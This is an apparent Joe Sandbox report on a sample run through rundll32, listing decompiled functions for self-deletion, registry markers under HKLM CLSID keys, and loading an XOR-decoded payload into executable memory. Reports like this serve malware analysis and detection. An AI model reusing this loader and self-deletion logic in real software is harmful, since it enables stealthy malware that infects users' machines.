                                                                                              0x0426c421
                                                                                              0x0426c42c
                                                                                              0x0426c430
                                                                                              0x0426c439
                                                                                              0x0426c446
                                                                                              0x0426c446
                                                                                              0x0426c3a3
                                                                                              0x0426c395
                                                                                              0x0426c2bb
                                                                                              0x0426c45b

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000), ref: 0426C27B
                                                                                              • lstrcmpiW.KERNEL32(-00000002,rundll32.exe), ref: 0426C297
                                                                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0426C2CC
                                                                                                • Part of subcall function 04266C70: wsprintfW.USER32 ref: 04266CB8
                                                                                                • Part of subcall function 04266C70: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04266CF5
                                                                                                • Part of subcall function 04266C70: RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,?,?), ref: 04266D20
                                                                                                • Part of subcall function 04266C70: RegCloseKey.ADVAPI32(?), ref: 04266D36
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0426C2DC
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 0426C310
                                                                                              • Sleep.KERNEL32(000003E8,?), ref: 0426C421
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0426C439
                                                                                              • DeleteFileW.KERNEL32(?), ref: 0426C446
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
                                                                                              • String ID: Control$Dispatch$dat$rundll32.exe
                                                                                              • API String ID: 2408718126-2128312152
                                                                                              • Opcode ID: 67f3deeccb90ae7b18b20b8affe0380d52b92f6f634d5412c36de17ad09aaad4
                                                                                              • Instruction ID: ad82f18edd7b2c51dd377a9bd9631d9c63276705570b72f04d9666a2fdfc2382
                                                                                              • Opcode Fuzzy Hash: 67f3deeccb90ae7b18b20b8affe0380d52b92f6f634d5412c36de17ad09aaad4
                                                                                              • Instruction Fuzzy Hash: 4D4107B1B202155BFB20BB29EC44BAE7369DF80318F154156D907E72C0EE74BE858B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 94%
                                                                                              			E04266C70(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				char _v616;
                                                                                              				int _v620;
                                                                                              				int _v624;
                                                                                              				signed int _t28;
                                                                                              				long _t38;
                                                                                              				long _t41;
                                                                                              				char _t57;
                                                                                              				signed int _t71;
                                                                                              
                                                                                              				_t28 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t28 ^ _t71;
                                                                                              				_t57 = __ecx;
                                                                                              				_v616 = 0;
                                                                                              				_v620 = 4;
                                                                                              				E04266050(__ecx, L"SEOID",  &_v88, __edi, __esi); // executed
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				E0427DEA0(__edi,  &_v616, 0, _v620);
                                                                                              				_v612 = 0;
                                                                                              				_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612); // executed
                                                                                              				if(_t38 != 0) {
                                                                                              					L3:
                                                                                              					_v616 = _t57;
                                                                                              					_v620 = 4;
                                                                                              					_v612 = 0;
                                                                                              					_t41 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                                                              					if(_t41 != 0) {
                                                                                              						L5:
                                                                                              						return E04275AFE(_v8 ^ _t71);
                                                                                              					} else {
                                                                                              						RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4); // executed
                                                                                              						_t69 =  ==  ? 1 : 0;
                                                                                              						RegCloseKey(_v612);
                                                                                              						__eflags =  ==  ? 1 : 0;
                                                                                              						if(( ==  ? 1 : 0) != 0) {
                                                                                              							goto L2;
                                                                                              						} else {
                                                                                              							goto L5;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                                                              					_t70 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              					_t77 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						L2:
                                                                                              						return E04275AFE(_v8 ^ _t71);
                                                                                              					}
                                                                                              				}
                                                                                              			}















                                                                                              0x04266c79
                                                                                              0x04266c80
                                                                                              0x04266c84
                                                                                              0x04266c86
                                                                                              0x04266c94
                                                                                              0x04266ca3
                                                                                              0x04266cb8
                                                                                              0x04266cce
                                                                                              0x04266cd6
                                                                                              0x04266cf5
                                                                                              0x04266cfd
                                                                                              0x04266d56
                                                                                              0x04266d58
                                                                                              0x04266d65
                                                                                              0x04266d7f
                                                                                              0x04266d8b
                                                                                              0x04266d93
                                                                                              0x04266dd0
                                                                                              0x04266de1
                                                                                              0x04266d95
                                                                                              0x04266dac
                                                                                              0x04266dbf
                                                                                              0x04266dc2
                                                                                              0x04266dc8
                                                                                              0x04266dca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04266dca
                                                                                              0x04266cff
                                                                                              0x04266d20
                                                                                              0x04266d33
                                                                                              0x04266d36
                                                                                              0x04266d3c
                                                                                              0x04266d3e
                                                                                              0x00000000
                                                                                              0x04266d40
                                                                                              0x04266d40
                                                                                              0x04266d55
                                                                                              0x04266d55
                                                                                              0x04266d3e

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 04266CB8
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04266CF5
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,?,?), ref: 04266D20
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04266D36
                                                                                              • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04266D8B
                                                                                              • RegSetValueExW.KERNEL32(?,0429E09C,00000000,00000004,?,00000004), ref: 04266DAC
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04266DC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseValue$OpenQuery$Createwsprintf
                                                                                              • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 3707868688-3437544703
                                                                                              • Opcode ID: a07b4ce0d85caf18ba78c048864209bacaa803248d42e9d4c43402983a5f069e
                                                                                              • Instruction ID: 696c8c0e06f86d0819aacf9ff9a818c132ac6ec3d4a2e0e79a9b6a9676596a11
                                                                                              • Opcode Fuzzy Hash: a07b4ce0d85caf18ba78c048864209bacaa803248d42e9d4c43402983a5f069e
                                                                                              • Instruction Fuzzy Hash: A2313371A0922CABDB20AFA4ED8DFEBBBBCEF44704F000195A909E6141D6365E44CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 92%
                                                                                              			E042694D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				char _v612;
                                                                                              				void* _v616;
                                                                                              				int _v620;
                                                                                              				int _v624;
                                                                                              				signed int _t25;
                                                                                              				long _t35;
                                                                                              				char _t44;
                                                                                              				void* _t49;
                                                                                              				signed int _t65;
                                                                                              
                                                                                              				_t25 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t25 ^ _t65;
                                                                                              				E04266050(__ebx, __ecx,  &_v88, __edi, __esi); // executed
                                                                                              				_v612 = 0;
                                                                                              				_v620 = 4;
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				E0427DEA0(__edi,  &_v612, 0, _v620);
                                                                                              				_v616 = 0;
                                                                                              				_t35 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v616); // executed
                                                                                              				if(_t35 != 0) {
                                                                                              					L6:
                                                                                              					goto L7;
                                                                                              				} else {
                                                                                              					RegQueryValueExW(_v616, "1", 0,  &_v624,  &_v612,  &_v620);
                                                                                              					_t64 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v616);
                                                                                              					_t72 =  ==  ? 1 : 0;
                                                                                              					if(( ==  ? 1 : 0) == 0) {
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						_t44 = _v612 - 0x13c;
                                                                                              						_v612 = _t44;
                                                                                              						if(_t44 == 0x1fffffff || _t44 == 0x2fffffff) {
                                                                                              							L7:
                                                                                              							return E04275AFE(_v8 ^ _t65);
                                                                                              						} else {
                                                                                              							wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                                                              							_t49 = OpenEventW(0x1f0003, 0,  &_v608);
                                                                                              							if(_t49 == 0) {
                                                                                              								return E04275AFE(_v8 ^ _t65);
                                                                                              							} else {
                                                                                              								CloseHandle(_t49);
                                                                                              								goto L6;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}















                                                                                              0x042694d9
                                                                                              0x042694e0
                                                                                              0x042694e7
                                                                                              0x042694ef
                                                                                              0x04269500
                                                                                              0x04269510
                                                                                              0x04269526
                                                                                              0x0426952e
                                                                                              0x0426954d
                                                                                              0x04269555
                                                                                              0x042695f3
                                                                                              0x00000000
                                                                                              0x0426955b
                                                                                              0x0426957c
                                                                                              0x0426958f
                                                                                              0x04269592
                                                                                              0x04269598
                                                                                              0x0426959a
                                                                                              0x00000000
                                                                                              0x0426959c
                                                                                              0x042695a2
                                                                                              0x042695a7
                                                                                              0x042695b2
                                                                                              0x042695fa
                                                                                              0x04269607
                                                                                              0x042695bb
                                                                                              0x042695cb
                                                                                              0x042695e2
                                                                                              0x042695ea
                                                                                              0x04269618
                                                                                              0x042695ec
                                                                                              0x042695ed
                                                                                              0x00000000
                                                                                              0x042695ed
                                                                                              0x042695ea
                                                                                              0x042695b2
                                                                                              0x0426959a

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 04269510
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 0426954D
                                                                                              • RegQueryValueExW.ADVAPI32(?,0429E09C,00000000,?,00000000,?), ref: 0426957C
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04269592
                                                                                              • wsprintfW.USER32 ref: 042695CB
                                                                                              • OpenEventW.KERNEL32(001F0003,00000000,?), ref: 042695E2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 042695ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                                                              • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 1348839613-2346361075
                                                                                              • Opcode ID: 247f2b60d03aefcc7b7c5cda3f701dd9cb485e993b100fc0ab1fa21d57e12f63
                                                                                              • Instruction ID: 0d01e9bd4cf45a360fbf228e7c7743071e38d7a09833867cb6c5b9e5d467d0e0
                                                                                              • Opcode Fuzzy Hash: 247f2b60d03aefcc7b7c5cda3f701dd9cb485e993b100fc0ab1fa21d57e12f63
                                                                                              • Instruction Fuzzy Hash: 1C314671A0521CABDB20EFA4DD8DBEEB7BCEF04714F500195A509E2140DB75AE84CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 267 4269770-4269786 268 426978a-42697a9 CreateFileW 267->268 269 4269788 267->269 270 42697af-42697c1 GetFileSize 268->270 271 42698fc-4269902 268->271 269->268 272 42697c7-42697d4 270->272 273 42698f2-42698fb FindCloseChangeNotification 270->273 274 42697d6-42697e9 272->274 275 4269808-426980b 272->275 273->271 279 42698f1 274->279 285 42697ef-42697f4 274->285 276 4269860 275->276 277 426980d-4269820 ReadFile 275->277 280 4269862 276->280 278 4269826-426982b 277->278 277->279 282 426983c-4269846 278->282 283 426982d-4269839 278->283 279->273 284 4269865-4269879 VirtualAlloc 280->284 282->279 286 426984c-426985e SetFilePointer 282->286 283->282 284->279 287 426987b-426988c ReadFile 284->287 285->280 288 42697f6-4269806 285->288 286->284 287->279 289 426988e-4269893 287->289 288->280 290 42698b7-42698bb 289->290 291 4269895-42698b6 VirtualFree CloseHandle 289->291 292 42698de-42698ea call 4265540 290->292 293 42698bd-42698c0 290->293 292->279 298 42698ec-42698ef 292->298 293->292 295 42698c2-42698c6 293->295 295->292 297 42698c8-42698ca 295->297 299 42698d2 297->299 300 42698cc-42698d0 297->300 298->279 301 42698d6-42698d9 299->301 300->301 301->297 302 42698db 301->302 302->292
                                                                                              C-Code - Quality: 100%
                                                                                              			E04269770(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                              				void _v8;
                                                                                              				long _v12;
                                                                                              				void* _v16;
                                                                                              				void* _v20;
                                                                                              				intOrPtr* _v24;
                                                                                              				void* _t36;
                                                                                              				intOrPtr _t40;
                                                                                              				void* _t41;
                                                                                              				signed char _t46;
                                                                                              				int _t52;
                                                                                              				void _t53;
                                                                                              				long _t60;
                                                                                              				void* _t62;
                                                                                              				intOrPtr* _t67;
                                                                                              				WCHAR* _t68;
                                                                                              				long _t69;
                                                                                              				long _t71;
                                                                                              				void* _t76;
                                                                                              
                                                                                              				_t68 = __edx;
                                                                                              				_t76 = 0;
                                                                                              				_v24 = __ecx;
                                                                                              				_v8 = 0;
                                                                                              				_v12 = 0;
                                                                                              				if(__ecx != 0) {
                                                                                              					 *__ecx = 0;
                                                                                              				}
                                                                                              				_t36 = CreateFileW(_t68, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                                                                              				_v16 = _t36;
                                                                                              				if(_t36 == 0xffffffff) {
                                                                                              					L32:
                                                                                              					return _t76;
                                                                                              				} else {
                                                                                              					_t60 = GetFileSize(_t36, 0);
                                                                                              					_v20 = _t76;
                                                                                              					if(_t60 < 1) {
                                                                                              						L31:
                                                                                              						FindCloseChangeNotification(_v16); // executed
                                                                                              						goto L32;
                                                                                              					} else {
                                                                                              						_t40 = _a4;
                                                                                              						if(_t40 != 1) {
                                                                                              							if(_t40 != 2) {
                                                                                              								_t71 = _t60;
                                                                                              								goto L15;
                                                                                              							} else {
                                                                                              								_t52 = ReadFile(_v16,  &_v8, 4,  &_v12, 0); // executed
                                                                                              								if(_t52 == 0) {
                                                                                              									goto L30;
                                                                                              								} else {
                                                                                              									_t53 = _v8;
                                                                                              									if(_t53 > _t60) {
                                                                                              										_t53 = _t53 - 0xc8372a;
                                                                                              										_v20 = 1;
                                                                                              										_v8 = _t53;
                                                                                              									}
                                                                                              									_t71 = _t60 - _t53 - 4;
                                                                                              									if(_t71 < 1) {
                                                                                              										goto L30;
                                                                                              									} else {
                                                                                              										_t62 = _v16;
                                                                                              										SetFilePointer(_t62, _t53 + 4, 0, 0); // executed
                                                                                              										goto L16;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							if(ReadFile(_v16,  &_v8, 4,  &_v12, 0) == 0) {
                                                                                              								L30:
                                                                                              								goto L31;
                                                                                              							} else {
                                                                                              								_t71 = _v8;
                                                                                              								if(_t71 > _t60) {
                                                                                              									_t71 = _t71 - 0xc8372a;
                                                                                              									_v20 = 1;
                                                                                              									_v8 = _t71;
                                                                                              								}
                                                                                              								L15:
                                                                                              								_t62 = _v16;
                                                                                              								L16:
                                                                                              								_t41 = VirtualAlloc(0, _t71, 0x1000, 0x40); // executed
                                                                                              								_t76 = _t41;
                                                                                              								if(_t76 == 0 || ReadFile(_t62, _t76, _t71,  &_v12, 0) == 0) {
                                                                                              									goto L30;
                                                                                              								} else {
                                                                                              									_t69 = _v12;
                                                                                              									if(_t69 == _t71) {
                                                                                              										if(_v20 != 0 && _t69 > 1) {
                                                                                              											_t46 = 0;
                                                                                              											if(_t69 != 0) {
                                                                                              												do {
                                                                                              													if((_t46 & 0x00000001) != 0) {
                                                                                              														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x0000006a;
                                                                                              													} else {
                                                                                              														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x000000a7;
                                                                                              													}
                                                                                              													_t46 = _t46 + 1;
                                                                                              												} while (_t46 < _t69);
                                                                                              												_t69 = _v12;
                                                                                              											}
                                                                                              										}
                                                                                              										E04265540(_t76, _t69);
                                                                                              										_t67 = _v24;
                                                                                              										if(_t67 != 0) {
                                                                                              											 *_t67 = _v12;
                                                                                              										}
                                                                                              										goto L30;
                                                                                              									} else {
                                                                                              										VirtualFree(_t76, 0, 0x8000);
                                                                                              										CloseHandle(_v16);
                                                                                              										return 0;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x04269770
                                                                                              0x04269779
                                                                                              0x0426977b
                                                                                              0x0426977e
                                                                                              0x04269781
                                                                                              0x04269786
                                                                                              0x04269788
                                                                                              0x04269788
                                                                                              0x0426979d
                                                                                              0x042697a3
                                                                                              0x042697a9
                                                                                              0x042698fc
                                                                                              0x04269902
                                                                                              0x042697af
                                                                                              0x042697b9
                                                                                              0x042697bb
                                                                                              0x042697c1
                                                                                              0x042698f2
                                                                                              0x042698f5
                                                                                              0x00000000
                                                                                              0x042697c7
                                                                                              0x042697c7
                                                                                              0x042697d4
                                                                                              0x0426980b
                                                                                              0x04269860
                                                                                              0x00000000
                                                                                              0x0426980d
                                                                                              0x0426981c
                                                                                              0x04269820
                                                                                              0x00000000
                                                                                              0x04269826
                                                                                              0x04269826
                                                                                              0x0426982b
                                                                                              0x0426982d
                                                                                              0x04269832
                                                                                              0x04269839
                                                                                              0x04269839
                                                                                              0x04269840
                                                                                              0x04269846
                                                                                              0x00000000
                                                                                              0x0426984c
                                                                                              0x0426984c
                                                                                              0x04269858
                                                                                              0x00000000
                                                                                              0x04269858
                                                                                              0x04269846
                                                                                              0x04269820
                                                                                              0x042697d6
                                                                                              0x042697e9
                                                                                              0x042698f1
                                                                                              0x00000000
                                                                                              0x042697ef
                                                                                              0x042697ef
                                                                                              0x042697f4
                                                                                              0x042697f6
                                                                                              0x042697fc
                                                                                              0x04269803
                                                                                              0x04269803
                                                                                              0x04269862
                                                                                              0x04269862
                                                                                              0x04269865
                                                                                              0x0426986f
                                                                                              0x04269875
                                                                                              0x04269879
                                                                                              0x00000000
                                                                                              0x0426988e
                                                                                              0x0426988e
                                                                                              0x04269893
                                                                                              0x042698bb
                                                                                              0x042698c2
                                                                                              0x042698c6
                                                                                              0x042698c8
                                                                                              0x042698ca
                                                                                              0x042698d2
                                                                                              0x042698cc
                                                                                              0x042698cc
                                                                                              0x042698cc
                                                                                              0x042698d6
                                                                                              0x042698d7
                                                                                              0x042698db
                                                                                              0x042698db
                                                                                              0x042698c6
                                                                                              0x042698e0
                                                                                              0x042698e5
                                                                                              0x042698ea
                                                                                              0x042698ef
                                                                                              0x042698ef
                                                                                              0x00000000
                                                                                              0x04269895
                                                                                              0x0426989d
                                                                                              0x042698a9
                                                                                              0x042698b6
                                                                                              0x042698b6
                                                                                              0x04269893
                                                                                              0x04269879
                                                                                              0x042697e9
                                                                                              0x042697d4
                                                                                              0x042697c1

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,?,?,0426C38E,00000001), ref: 0426979D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0426C38E,00000001), ref: 042697B3
                                                                                              • ReadFile.KERNEL32(?,00000001,00000004,0426C38E,00000000,00000000,?,?,?,0426C38E,00000001), ref: 0426981C
                                                                                              • SetFilePointer.KERNEL32(?,-00000003,00000000,00000000,?,?,?,0426C38E,00000001), ref: 04269858
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,0426C38E,00000001), ref: 0426986F
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,0426C38E,00000000,?,?,?,0426C38E,00000001), ref: 04269884
                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,0426C38E,00000001), ref: 0426989D
                                                                                              • CloseHandle.KERNEL32(?,?,?,0426C38E,00000001), ref: 042698A9
                                                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,?,0426C38E,00000001), ref: 042698F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseReadVirtual$AllocChangeCreateFindFreeHandleNotificationPointerSize
                                                                                              • String ID:
                                                                                              • API String ID: 3130169213-0
                                                                                              • Opcode ID: 445749ab1355b9c0bd1c9d0709d760f0c2977cb3c6ff7a0c70700527a3c4cd0c
                                                                                              • Instruction ID: 150e3ac298803682b373b524fc495b458abfeb064e7e69dc4ef819078a0b418c
                                                                                              • Opcode Fuzzy Hash: 445749ab1355b9c0bd1c9d0709d760f0c2977cb3c6ff7a0c70700527a3c4cd0c
                                                                                              • Instruction Fuzzy Hash: 544163B1F10315ABDB209AA8DC88BAEBB79EB45750F204165F506EB180DF71AAC1CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 95%
                                                                                              			E042696B0(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				signed int _t11;
                                                                                              				int _t20;
                                                                                              				char* _t26;
                                                                                              				int _t35;
                                                                                              				signed int _t38;
                                                                                              
                                                                                              				_t11 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t11 ^ _t38;
                                                                                              				_t35 = __edx;
                                                                                              				_t26 = __ecx;
                                                                                              				E042654D0(__ecx, __edx);
                                                                                              				E04266050(__ecx, L"Global",  &_v88, __edx, __esi); // executed
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_v612 = 0;
                                                                                              				_t20 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                                                              				if(_t20 == 0) {
                                                                                              					RegSetValueExW(_v612, "1", _t20, 3, _t26, _t35); // executed
                                                                                              					_t37 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t38);
                                                                                              			}












                                                                                              0x042696b9
                                                                                              0x042696c0
                                                                                              0x042696c6
                                                                                              0x042696c8
                                                                                              0x042696ca
                                                                                              0x042696d7
                                                                                              0x042696ec
                                                                                              0x042696fd
                                                                                              0x0426971a
                                                                                              0x04269722
                                                                                              0x04269734
                                                                                              0x04269747
                                                                                              0x0426974a
                                                                                              0x0426974a
                                                                                              0x04269762

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 042696EC
                                                                                              • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0426971A
                                                                                              • RegSetValueExW.KERNEL32(?,0429E09C,00000000,00000003,00000000,00000000), ref: 04269734
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0426974A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 73588525-1865207932
                                                                                              • Opcode ID: c742efdd9a6721608cfb8510fd1ec07cd9bc69f91c6c626805e65c49941b775c
                                                                                              • Instruction ID: 6c8ed6eeacec121ef0159ff44e3c9949a1681ee6469ec59d4233fa96d12a3f6f
                                                                                              • Opcode Fuzzy Hash: c742efdd9a6721608cfb8510fd1ec07cd9bc69f91c6c626805e65c49941b775c
                                                                                              • Instruction Fuzzy Hash: F3118D7171522CBBDB20DFA5EC4DEABBB7CEF44715F000165B909E2141DA759D44CAA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 312 4265960-426597f LoadLibraryA GetProcAddress 313 42659b1-42659b6 312->313 314 4265981-42659a0 GetNativeSystemInfo 312->314 315 42659a2-42659a6 314->315 316 42659a8-42659b0 314->316 315->313 315->316
                                                                                              C-Code - Quality: 29%
                                                                                              			E04265960() {
                                                                                              				intOrPtr _v8;
                                                                                              				char _v40;
                                                                                              				_Unknown_base(*)()* _t5;
                                                                                              				intOrPtr _t8;
                                                                                              
                                                                                              				_t5 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                              				if(_t5 == 0) {
                                                                                              					L4:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					_v8 = 0;
                                                                                              					asm("movups [ebp-0x24], xmm0");
                                                                                              					asm("movups [ebp-0x14], xmm0"); // executed
                                                                                              					 *_t5( &_v40); // executed
                                                                                              					_t8 = _v40;
                                                                                              					if(_t8 == 6 || _t8 == 9) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				}
                                                                                              			}







                                                                                              0x04265977
                                                                                              0x0426597f
                                                                                              0x042659b1
                                                                                              0x042659b6
                                                                                              0x04265981
                                                                                              0x04265981
                                                                                              0x04265984
                                                                                              0x0426598f
                                                                                              0x04265993
                                                                                              0x04265997
                                                                                              0x04265999
                                                                                              0x042659a0
                                                                                              0x042659b0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042659a0

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0426C36B), ref: 04265970
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04265977
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 04265997
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
